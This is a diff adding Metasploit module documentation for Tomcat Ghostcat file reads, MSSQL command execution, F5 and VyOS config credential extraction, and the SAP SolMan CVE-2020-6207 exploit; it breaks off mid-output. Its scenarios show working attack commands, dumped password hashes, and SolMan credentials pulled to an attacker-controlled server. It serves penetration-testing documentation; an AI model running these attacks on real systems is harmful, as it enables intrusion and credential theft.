+                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
+  version="3.1"
+  metadata-complete="true">
+
+  <display-name>Welcome to Tomcat</display-name>
+  <description>
+     Welcome to Tomcat
+  </description>
+
+</web-app>
+
+[+] 127.0.0.1:8080 - /Users/user/.msf4/loot/20210408102538_default_127.0.0.1_WEBINFweb.xml_436040.txt
+[*] Auxiliary module execution completed
+```
+
+### Apache Tomcat on Windows 10.0.16299.125
+
+```
+  [*] Processing tomcat_ghostcat.rb for ERB directives.
+  resource (tomcat_ghostcat.rb)> use auxiliary/admin/http/tomcat_ghostcat
+  resource (tomcat_ghostcat.rb)> set rport 8080
+  rport => 8080
+  resource (tomcat_ghostcat.rb)> set rhosts 127.0.0.1
+  rhosts => 127.0.0.1
+  resource (tomcat_ghostcat.rb)> set verbose true
+  verbose => true
+  resource (tomcat_ghostcat.rb)> set FILENAME /WEB-INF/web.xml
+  filename => /WEB-INF/web.xml
+
+  resource (tomcat_ghostcat.rb)> run
+  [*] Running module against 127.0.0.1
+  <?xml version="1.0" encoding="UTF-8"?>
+<!--
+    Copyright 2017 The MIT Internet Trust Consortium
+
+    Portions copyright 2011-2013 The MITRE Corporation
+
+    Licensed under the Apache License, Version 2.0 (the "License");
+    you may not use this file except in compliance with the License.
+    You may obtain a copy of the License at
+
+      http://www.apache.org/licenses/LICENSE-2.0
+
+    Unless required by applicable law or agreed to in writing, software
+    distributed under the License is distributed on an "AS IS" BASIS,
+    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    See the License for the specific language governing permissions and
+    limitations under the License.
+-->
+
+  <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+
+xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
+http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd">
+
+version = "4.0"
+metadata-complete="true">
+
+<display-name> Welcome to Tomcat </display-name>
+<description>
+ Welcome to Tomcat
+ </description>
+
+ <web-app>
+[*] Auxiliary module execution completed
+
+```
@@ -1,6 +1,6 @@
 ## Description

-This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpvulndb.com/vulnerabilities/9144)), which affects versions 1.4.2 and lower.
+This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpscan.com/vulnerability/9144)), which affects versions 1.4.2 and lower.

 When a user triggers GDPR-related actions, Wordpress's `admin-ajax.php` is called but fails to do validation and capacity checks regarding the asked actions. This leads to any unauthenticated user being able to modify any arbitrary settings on the targeted server.

@@ -0,0 +1,55 @@
+## Description
+
+This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the sp_oacreate
+procedure (more opsec safe, no output, no temporary data table). A valid username and password is required to use this
+module. The sp_oacreate function is used in metasploit to rebuild the xp_cmdshell stored procedure but can be used
+directly to get code execution which is the more opsec safe way.
+
+## Options
+
+### TECHNIQUE
+Technique to use for command execution.
+
+When `xp_cmdshell` is selected, the corresponding stored procedure is used. The [`xp_cmdshell`][1] stored procedure is
+disabled by default, but Metasploit will attempt to enable it which requires elevated privileges. This technique returns
+the output when the command was successfully run. If this technique fails, the module will attempt to use the
+`sp_oacreate` technique instead.
+
+When `sp_oacreate` is selected, a more stealthy technique will be used however no command output will be available. This
+technique leverages the [`sp_OACreate`][2] stored procedure to create an instance of an OLE object and invokes
+`wscript.shell`.
+
+## Verification Steps
+
+1. Do: `use use admin/mssql/mssql_exec`
+2. Do: `set USERNAME [username1]`
+3. Do: `set PASSWORD [password1]`
+3. Do: `set TECHNIQUE sp_oacreate` (optional, defaults to xp_cmdshell)
+4. Do: `set RHOSTS [IP]`
+5. Do: `set CMD [command]`
+6. Do: `run`
+
+## Scenarios
+
+```
+msf > use use use admin/mssql/mssql_exec
+msf auxiliary(mssql_exec) > set USERNAME username1
+USERNAME => username1
+msf auxiliary(mssql_exec) > set PASSWORD password1
+PASSWORD => password1
+msf auxiliary(mssql_exec) > set TECHNIQUE sp_oacreate
+TECHNIQUE => sp_oacreate
+msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
+RHOST => 192.168.1.195
+msf auxiliary(mssql_exec) > set CMD cmd.exe /c echo OWNED > C:\owned.txt
+CMD => cmd.exe /c echo OWNED > C:\owned.txt
+msf auxiliary(mssql_exec) > run
+
+[*] 192.168.1.195:1433 - Enabling advanced options and ole automation procedures.
+[*] 192.168.1.195:1433 - Executing command using sp_oacreate. No output will be displayed.
+[*] Auxiliary module execution completed
+msf auxiliary(mssql_exec_oacreate) >
+```
+
+[1]: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15
+[2]: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql?view=sql-server-ver15
@@ -0,0 +1,525 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports an F5 configuration file into the database.
+This is similar to `post/networking/gather/enum_f5` only access isn't required,
+and assumes you already have the file.
+
+### Example Config
+
+```
+#TMSH-VERSION: 15.1.0.2
+
+cm cert /Common/dtca-bundle.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca-bundle.crt_62970_3
+    checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
+    revision 3
+}
+cm cert /Common/dtca.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca.crt_62966_3
+    checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
+    revision 3
+}
+cm cert /Common/dtdi.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtdi.crt_62962_3
+    checksum SHA1:1285:0f4ddae3808474c70911f43725c7cfdb46aa4430
+    revision 3
+}
+cm device /Common/f5bigip.home.com {
+    active-modules { "BIG-IP, VE Trial|VTFLRXF-LFSIQYY|Rate Shaping|External Interface and Network HSM, VE|SDN Services, VE|SSL, Forward Proxy, VE|BIG-IP VE, Multicast Routing|APM, Limited|SSL, VE|DNS (1K QPS), VE|Routing Bundle, VE|ASM, VE|Crytpo Offload, VE, Tier 1 (25M - 200M)|Max Compression, VE|AFM, VE|DNSSEC|Anti-Virus Checks|Base Endpoint Security Checks|Firewall Checks|Network Access|Secure Virtual Keyboard|APM, Web Application|Machine Certificate Checks|Protected Workspace|Remote Desktop|App Tunnel|VE, Carrier Grade NAT (AFM ONLY)|PSM, VE" }
+    base-mac aa:aa:aa:aa:aa:aa
+    build 0.0.9
+    cert /Common/dtdi.crt
+    chassis-id 564dcf79-53ce-3494-3217671849c7
+    configsync-ip 10.10.10.222
+    edition "Point Release 2"
+    hostname f5bigip.home.com
+    key /Common/dtdi.key
+    management-ip 2.2.2.2
+    marketing-name "BIG-IP Virtual Edition"
+    platform-id Z100
+    product BIG-IP
+    self-device true
+    time-zone America/Los_Angeles
+    version 15.1.0.2
+}
+cm device-group /Common/device_trust_group {
+    auto-sync enabled
+    devices {
+        /Common/f5bigip.home.com { }
+    }
+    hidden true
+    network-failover disabled
+}
+cm device-group /Common/gtm {
+    devices {
+        /Common/f5bigip.home.com { }
+    }
+    hidden true
+    network-failover disabled
+}
+cm key /Common/dtca.key {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtca.key_62968_3
+    checksum SHA1:1704:f274958ad619b0c70d8ccc4f7c5ae199061464e6
+    revision 3
+}
+cm key /Common/dtdi.key {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtdi.key_62964_3
+    checksum SHA1:1704:97eeb5aedee76b3c21e6d735604a092e830ef6c2
+    revision 3
+}
+cm traffic-group /Common/traffic-group-1 {
+    unit-id 1
+}
+cm traffic-group /Common/traffic-group-local-only { }
+cm trust-domain /Common/Root {
+    ca-cert /Common/dtca.crt
+    ca-cert-bundle /Common/dtca-bundle.crt
+    ca-devices { /Common/f5bigip.home.com }
+    ca-key /Common/dtca.key
+    guid fe0ee274-0355-4940-acc7000c291849c7
+    status standalone
+    trust-group /Common/device_trust_group
+}
+net interface 1.1 {
+    media-fixed 10000T-FD
+}
+net interface 1.2 {
+    media-fixed 10000T-FD
+}
+net interface 1.3 {
+    media-fixed 10000T-FD
+}
+net port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+net port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+net route-domain /Common/0 {
+    id 0
+    vlans {
+        /Common/http-tunnel
+        /Common/socks-tunnel
+        /Common/internal
+    }
+}
+net self /Common/10.10.10.223 {
+    address 10.10.10.223/8
+    allow-service {
+        default
+    }
+    traffic-group /Common/traffic-group-1
+    vlan /Common/internal
+}
+net self /Common/10.10.10.222 {
+    address 10.10.10.222/8
+    allow-service {
+        default
+    }
+    traffic-group /Common/traffic-group-local-only
+    vlan /Common/internal
+}
+net self-allow {
+    defaults {
+        igmp:0
+        ospf:0
+        pim:0
+        tcp:161
+        tcp:22
+        tcp:4353
+        tcp:443
+        tcp:53
+        udp:1026
+        udp:161
+        udp:4353
+        udp:520
+        udp:53
+    }
+}
+net stp /Common/cist { }
+net vlan /Common/internal {
+    tag 4094
+}
+net fdb tunnel /Common/http-tunnel { }
+net fdb tunnel /Common/socks-tunnel { }
+net fdb vlan /Common/internal { }
+net tunnels tunnel /Common/http-tunnel {
+    description "Tunnel for http-explicit profile"
+    profile /Common/tcp-forward
+}
+net tunnels tunnel /Common/socks-tunnel {
+    description "Tunnel for socks profile"
+    profile /Common/tcp-forward
+}
+security device-id attribute /Common/att01 {
+    id 1
+}
+security device-id attribute /Common/att02 {
+    id 2
+}
+security device-id attribute /Common/att03 {
+    id 3
+}
+security device-id attribute /Common/att04 {
+    id 4
+}
+security device-id attribute /Common/att05 {
+    id 5
+}
+security device-id attribute /Common/att06 {
+    id 6
+}
+security device-id attribute /Common/att07 {
+    id 7
+}
+security device-id attribute /Common/att08 {
+    id 8
+}
+security device-id attribute /Common/att09 {
+    id 9
+}
+security device-id attribute /Common/att10 {
+    id 10
+}
+security device-id attribute /Common/att11 {
+    id 11
+}
+security device-id attribute /Common/att12 {
+    id 12
+}
+security device-id attribute /Common/att13 {
+    id 13
+}
+security device-id attribute /Common/att14 {
+    id 14
+}
+security device-id attribute /Common/att15 {
+    id 15
+}
+security device-id attribute /Common/att16 {
+    id 16
+}
+security device-id attribute /Common/att17 {
+    id 17
+}
+security device-id attribute /Common/att18 {
+    id 18
+}
+security device-id attribute /Common/att19 {
+    id 19
+}
+security device-id attribute /Common/att20 {
+    id 20
+}
+security device-id attribute /Common/att21 {
+    id 21
+}
+security device-id attribute /Common/att22 {
+    id 22
+}
+security device-id attribute /Common/att23 {
+    id 23
+}
+security device-id attribute /Common/att24 {
+    id 24
+}
+security device-id attribute /Common/att25 {
+    id 25
+}
+security device-id attribute /Common/att26 {
+    id 26
+}
+security device-id attribute /Common/att27 {
+    id 27
+}
+security device-id attribute /Common/att28 {
+    id 28
+}
+security device-id attribute /Common/att29 {
+    id 29
+}
+security device-id attribute /Common/att30 {
+    id 30
+}
+security device-id attribute /Common/att31 {
+    id 31
+}
+security device-id attribute /Common/att32 {
+    id 32
+}
+security device-id attribute /Common/att33 {
+    id 33
+}
+security device-id attribute /Common/att34 {
+    id 34
+}
+security device-id attribute /Common/att35 {
+    id 35
+}
+security device-id attribute /Common/att36 {
+    id 36
+}
+security device-id attribute /Common/att37 {
+    id 37
+}
+security device-id attribute /Common/att38 {
+    id 38
+}
+security device-id attribute /Common/att39 {
+    id 39
+}
+security firewall config-entity-id /Common/uuid_entity_id {
+    entity-id 3346813779321352940
+}
+security firewall port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+security firewall port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_all {
+    rules {
+        _sys_allow_all {
+            action accept
+            ip-protocol any
+        }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_defaults {
+    rules {
+        _sys_allow_tcp_defaults {
+            action accept
+            ip-protocol tcp
+            destination {
+                port-lists {
+                    /Common/_sys_self_allow_tcp_defaults
+                }
+            }
+        }
+        _sys_allow_udp_defaults {
+            action accept
+            ip-protocol udp
+            destination {
+                port-lists {
+                    /Common/_sys_self_allow_udp_defaults
+                }
+            }
+        }
+        _sys_allow_ospf_defaults {
+            action accept
+            ip-protocol ospf
+        }
+        _sys_allow_pim_defaults {
+            action accept
+            ip-protocol pim
+        }
+        _sys_allow_igmp_defaults {
+            action accept
+            ip-protocol igmp
+        }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_management {
+    rules {
+        _sys_allow_ssh {
+            action accept
+            ip-protocol tcp
+            destination {
+                ports {
+                    22 { }
+                }
+            }
+        }
+        _sys_allow_web {
+            action accept
+            ip-protocol tcp
+            destination {
+                ports {
+                    443 { }
+                }
+            }
+        }
+    }
+}
+security ip-intelligence policy /Common/ip-intelligence { }
+security shared-objects port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+security shared-objects port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+sys dns {
+    description configured-by-dhcp
+    name-servers { 192.168.2.40 9.9.9.9 }
+    search { ragedomain }
+}
+sys folder / {
+    device-group none
+    hidden false
+    inherited-devicegroup false
+    inherited-traffic-group false
+    traffic-group /Common/traffic-group-1
+}
+sys folder /Common {
+    device-group none
+    hidden false
+    inherited-devicegroup true
+    inherited-traffic-group true
+    traffic-group /Common/traffic-group-1
+}
+sys folder /Common/Drafts {
+    device-group none
+    hidden false
+    inherited-devicegroup true
+    inherited-traffic-group true
+    traffic-group /Common/traffic-group-1
+}
+sys global-settings {
+    hostname f5bigip.home.com
+}
+sys management-dhcp /Common/sys-mgmt-dhcp-config {
+    request-options { subnet-mask broadcast-address routers domain-name domain-name-servers host-name ntp-servers interface-mtu }
+}
+sys provision ltm {
+    level nominal
+}
+sys snmp {
+    agent-addresses { tcp6:161 udp6:161 }
+    communities {
+        /Common/comm-public {
+            community-name public
+            source default
+        }
+    }
+    disk-monitors {
+        /Common/root {
+            minspace 2000
+            path /
+        }
+        /Common/var {
+            minspace 10000
+            path /var
+        }
+    }
+    process-monitors {
+        /Common/bigd {
+            max-processes infinity
+            process bigd
+        }
+        /Common/chmand {
+            process chmand
+        }
+        /Common/httpd {
+            max-processes infinity
+            process httpd
+        }
+        /Common/mcpd {
+            process mcpd
+        }
+        /Common/sod {
+            process sod
+        }
+        /Common/tmm {
+            max-processes infinity
+            process tmm
+        }
+    }
+}
+sys dynad settings {
+    development-mode false
+}
+sys fpga firmware-config {
+    type standard-balanced-fpga
+}
+sys sflow global-settings http { }
+sys sflow global-settings vlan { }
+sys turboflex profile-config {
+    type turboflex-adc
+}
+```
+
+## Verification Steps
+
+1. Have an F5 configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/f5_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+## Scenarios
+
+### F5 Big-IP 15.1.0.2 (virtual on ESXi)
+
+```
+resource (f5.rb)> use auxiliary/admin/networking/f5_config
+resource (f5.rb)> set config /home/h00die/Downloads/f5_config.txt
+config => /home/h00die/Downloads/f5_config.txt
+resource (f5.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (f5.rb)> set verbose true
+verbose => true
+resource (f5.rb)> run
+[*] Running module against 127.0.0.1
+[*] Importing config
+[+] 127.0.0.1:22 SNMP Community 'public' with RO access
+[+] 127.0.0.1:22 Hostname: f5bigip.home.com
+[+] 127.0.0.1:22 MAC Address: aa:aa:aa:aa:aa:aa
+[+] 127.0.0.1:22 Management IP: 2.2.2.2
+[+] 127.0.0.1:22 Product BIG-IP
+[+] 127.0.0.1:22 OS Version: 15.1.0.2
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
@@ -0,0 +1,223 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports a VyOS configuration file into the database.
+This is similar to `post/networking/gather/enum_vyos` only access isn't required,
+and assumes you already have the file.
+
+VyOS is available to download from [VyOS.io](https://downloads.vyos.io/).
+
+Example config file:
+
+#### VyOS 1.3
+
+```
+interfaces {
+    ethernet eth0 {
+        address 10.10.10.10/24
+        description "desc two"
+        hw-id 00:0c:29:ab:ce:16
+    }
+    ethernet eth1 {
+        hw-id 00:0c:29:ab:ce:20
+    }
+    loopback lo {
+    }
+}
+service {
+    snmp {
+        community ro {
+            authorization ro
+        }
+        community write {
+            authorization rw
+        }
+    }
+}
+system {
+    config-management {
+        commit-revisions 100
+    }
+    console {
+        device ttyS0 {
+            speed 115200
+        }
+    }
+    host-name vyos
+    login {
+        user vyos {
+            authentication {
+                encrypted-password $6$km/6j4hX0Ayo$dk2z5LeUOayHopgLGZJII0whBMidnvsd4LfT6LcIcR9ReabX0kcXjZOlmmqDGWuo1FvpnV.X2IRl5NeEZpuI31
+                plaintext-password ""
+            }
+        }
+    }
+    ntp {
+        server 0.pool.ntp.org {
+        }
+        server 1.pool.ntp.org {
+        }
+        server 2.pool.ntp.org {
+        }
+    }
+    syslog {
+        global {
+            facility all {
+                level info
+            }
+            facility protocols {
+                level debug
+            }
+        }
+    }
+}
+// Warning: Do not remove the following line.
+// vyos-config-version: "broadcast-relay@1:cluster@1:config-management@1:conntrack@1:conntrack-sync@1:dhcp-relay@2:dhcp-server@5:dhcpv6-server@1:dns-forwarding@3:firewall@5:https@2:interfaces@12:ipoe-server@1:ipsec@5:l2tp@3:lldp@1:mdns@1:nat@5:ntp@1:pppoe-server@4:pptp@2:qos@1:quagga@6:salt@1:snmp@2:ssh@2:sstp@2:system@18:vrrp@2:vyos-accel-ppp@2:wanloadbalance@3:webgui@1:webproxy@2:zone-policy@1"
+// Release version: 1.3-rolling-202008270118
+```
+
+#### VyOS 1.1.8
+```
+interfaces {
+    ethernet eth0 {
+        description "eth0 main"
+        duplex auto
+        hw-id 00:0c:29:f4:45:0a
+        smp_affinity auto
+        speed auto
+        vif 90 {
+            address dhcp
+        }
+    }
+    ethernet eth1 {
+        address 10.10.10.10/24
+        duplex auto
+        hw-id 00:0c:29:f4:45:14
+        smp_affinity auto
+        speed auto
+    }
+    loopback lo {
+    }
+}
+service {
+    snmp {
+        community ro {
+            authorization ro
+        }
+        community write {
+            authorization rw
+        }
+    }
+}
+system {
+    config-management {
+        commit-revisions 20
+    }
+    console {
+    }
+    host-name vyos118
+    login {
+        user jsmith {
+            authentication {
+                encrypted-password $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
+                plaintext-password ""
+            }
+            full-name "john smith"
+            level operator
+        }
+        user vyos {
+            authentication {
+                encrypted-password $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
+                plaintext-password ""
+            }
+            level admin
+        }
+    }
+    ntp {
+        server 0.pool.ntp.org {
+        }
+        server 1.pool.ntp.org {
+        }
+        server 2.pool.ntp.org {
+        }
+    }
+    package {
+        auto-sync 1
+        repository community {
+            components main
+            distribution helium
+            password ""
+            url http://packages.vyos.net/vyos
+            username ""
+        }
+    }
+    syslog {
+        global {
+            facility all {
+                level notice
+            }
+            facility protocols {
+                level debug
+            }
+        }
+    }
+    time-zone UTC
+}
+
+
+/* Warning: Do not remove the following line. */
+/* === vyatta-config-version: "cluster@1:config-management@1:conntrack-sync@1:conntrack@1:cron@1:dhcp-relay@1:dhcp-server@4:firewall@5:ipsec@4:nat@4:qos@1:quagga@2:system@6:vrrp@1:wanloadbalance@3:webgui@1:webproxy@1:zone-policy@1" === */
+/* Release version: VyOS 1.1.8 */
+```
+
+## Verification Steps
+
+1. Have a VyOS configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/vyos_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+## Scenarios
+
+### VyOS 1.1.8
+
+```
+msf6 > use auxiliary/admin/networking/vyos_config 
+msf6 auxiliary(admin/networking/vyos_config) > set config /tmp/vyos.config
+config => /tmp/vyos.config
+msf6 auxiliary(admin/networking/vyos_config) > set verbose true
+verbose => true
+msf6 auxiliary(admin/networking/vyos_config) > run
+[-] Auxiliary failed: Msf::OptionValidateError One or more options failed to validate: RHOSTS.
+msf6 auxiliary(admin/networking/vyos_config) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(admin/networking/vyos_config) > run
+[*] Running module against 1.1.1.1
+
+[*] Importing config
+[+] Config saved to: /home/h00die/.msf4/loot/20200920154519_default_1.1.1.1_vyos.config_295168.txt
+[+] 1.1.1.1:22 Username 'jsmith' with level 'operator' with hash $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
+[+] 1.1.1.1:22 Username 'vyos' with level 'admin' with hash $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
+[+] 1.1.1.1:22 SNMP Community 'ro' with ro access
+[+] 1.1.1.1:22 SNMP Community 'write' with rw access
+[+] 1.1.1.1:22 Hostname: vyos118
+[+] 1.1.1.1:22 OS Version: VyOS 1.1.8
+[+] 1.1.1.1:22 Interface eth1 (00:0c:29:f4:45:14) - 10.10.10.10
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+
@@ -0,0 +1,214 @@
+## Vulnerable Application
+This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
+SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
+checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
+send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
+
+Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute
+OS commands from the agent connected to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
+
+If a connected SMDAgent is also vulnerable to CVE-2019-0307, unauthenticated remote attackers can obtain its
+secstore.properties file, which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
+
+CVE-2019-0307 vulnerability paper: [The Agent Who Spoke Too Much][1]
+
+CVE-2020-6207 vulnerability paper: [An Unauthenticated Journey to Root][2]
+
+### Application Background
+In SAP landscapes, SolMan could be compared to a domain controller system in the Microsoft world.
+It is a technical system that is tightly connected to all other SAP systems with high privileges.
+Once an SAP system is connected to the solution manager, it receives the name of a "managed" or "satellite" system.
+As an administration solution, SolMan is intended to centralize the management of all systems within the landscape by
+performing actions such as implementing, supporting, monitoring and maintaining the enterprise solutions.
+
+### Installation Steps
+Steps to install, configure and manage SolMan can be found online at [this page][3].
+
+Once set up and configured, the instances will be vulnerable on the default HTTP port 50000.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `workspace [WORKSPACE]`
+1. Do: `use auxiliary/admin/sap/sap_2020_6207_solman_rce`
+1. Do: `set RHOSTS [IP]`
+1. Do: `set action LIST`
+1. Do: `run`
+1. Verify that a list of connected agents was returned.
+1. Do: `set AGENT [Connected agent server name]`
+1. Do: `set SSRF_METHOD [GET, POST, PUT, DELETE, PATCH, ...]`
+1. Do: `set SSRF_URI [SSRF uri, example - http://1.1.1.1/test.html]`
+1. Do: `set action SSRF`
+1. Do: `run`
+1. Verify that the HTTP request from the connected agent has been sent.
+1. Do: `set AGENT [Connected agent server name]`
+1. Do: `set COMMAND [OS command, example - ping -c 4 1.1.1.1]`
+1. Do: `set action EXEC`
+1. Do: `run`
+1. Verify that the OS command has been executed on the connected agent.
+1. Do: `set AGENT [Connected agent server name]`
+1. Do: `set SRVHOST [Local IP]`
+1. Do: `set action SECSTORE`
+1. Do: `run`
+1. Verify that the credentials for Solution Manager have been obtained.
+
+## Options
+
+### TARGETURI
+
+This is the path to the EEM admin page of the SolMan that is vulnerable to CVE-2020-6207.
+By default, it is set to `/EemAdminService/EemAdmin`. However, it can be changed if SolMan
+was installed at a path different from that of the web root. For example, if the SolMan
+server was proxied to the `/solman/` path under the web root, then this value would be
+set to `/solman/EemAdminService/EemAdmin`.
+
+### AGENT
+
+Connected agent sever name.
+Example: `linux_agent`
+
+### SSRF_METHOD
+
+HTTP method for sending HTTP request from a connected agent, the server name of which is specified in the `AGENT` option.
+Example: `GET`
+
+### SSRF_URI
+
+URI for sending HTTP requests from a connected agent, the server name of which is specified in the `AGENT` option.
+Example: `http://1.1.1.1/test.html`
+
+### COMMAND
+
+OS command for executing in connected agent, the server name of which is specified in the `AGENT` option.
+Example: `ping -c 4 1.1.1.1`
+
+## Actions
+```
+   Name      Description
+   ----      -----------
+   EXEC      Exec OS command on connected agent
+   LIST      List connected agents
+   SECSTORE  Get file with SolMan credentials from connected agent
+   SSRF      Send SSRF from connected agent
+```
+
+## Scenarios
+
+### Vulnerable SolMan 7.2 running on agent: test_linux with OS: Linux and java version: 1.8
+
+```
+msf6 > workspace -a SAP_TEST
+[*] Added workspace: SAP_TEST
+[*] Workspace: SAP_TEST
+msf6 > use auxiliary/admin/sap/cve_2020_6207_solman_rce
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION LIST
+ACTION => LIST
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set RHOST 172.16.30.46
+RHOST => 172.16.30.46
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
+[*] Running module against 172.16.30.46
+
+[*] Getting a list of agents connected to the Solution Manager: 172.16.30.46
+[+] Successfully retrieved agent list:
+Connected Agents List
+=====================
+
+ Server Name   Host Name              Instance Name  OS Name                 Java Version
+ -----------   ---------              -------------  -------                 ------------
+ test_windows  sap731.corp.test.com   SMDA97         Windows Server 2008 R2  1.6.0_29
+ test_linux    saperp7.corp.test.com  SMDA98         Linux                   1.8.0_25
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SSRF
+ACTION => SSRF
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
+AGENT => test_linux
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_METHOD PUT
+SSRF_METHOD => PUT
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_URI http://192.168.50.3:7777/
+SSRF_URI => http://192.168.50.3:7777/
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
+[*] Running module against 172.16.30.46
+
+[*] Enable EEM on agent: test_linux
+[*] Start script: IqsDdgpc5Iwu with SSRF payload on agent: test_linux
+[*] Stop script: IqsDdgpc5Iwu on agent: test_linux
+[*] Delete script: IqsDdgpc5Iwu on agent: test_linux
+[+] Send SSRF: 'PUT http://192.168.50.3:7777/ HTTP/1.1' from agent: test_linux
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION EXEC
+ACTION => EXEC
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
+AGENT => test_linux
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set COMMAND ping -c 4 192.168.50.3
+COMMAND => ping -c 4 192.168.50.3
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
+[*] Running module against 172.16.30.46
+
+[*] Enable EEM on agent: test_linux
+[*] Start script: Lu5BnHgzVehn with RCE payload on agent: test_linux
+[*] Stop script: Lu5BnHgzVehn on agent: test_linux
+[*] Delete script: Lu5BnHgzVehn on agent: test_linux
+[+] Execution command: 'ping -c 4 192.168.50.3' on agent: test_linux
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SECSTORE
+ACTION => SECSTORE
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
+AGENT => test_linux
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SRVHOST 192.168.50.3
+SRVHOST => 192.168.50.3
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
+[*] Running module against 172.16.30.46
+
+[*] Enable EEM on agent: test_linux
+[*] Using URL: http://192.168.50.3:8000/ginMlA2izrNi
+[*] Start script: ginMlA2izrNi with payload for retrieving SolMan credentials file from agent: test_linux
+[*] Received HTTP request from agent test_linux - 172.16.30.14
+[+] Successfully retrieved file /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties from agent: test_linux saved in: /Users/vladimir/.msf4/loot/20210327204344_SAP_TEST_172.16.30.14_smdagent.secstor_025841.txt
+[+] Successfully encoded credentials for SolMan server: 172.16.30.46:50000 from agent: test_linux - 172.16.30.14
+[+] SMD Username: j2ee_admin
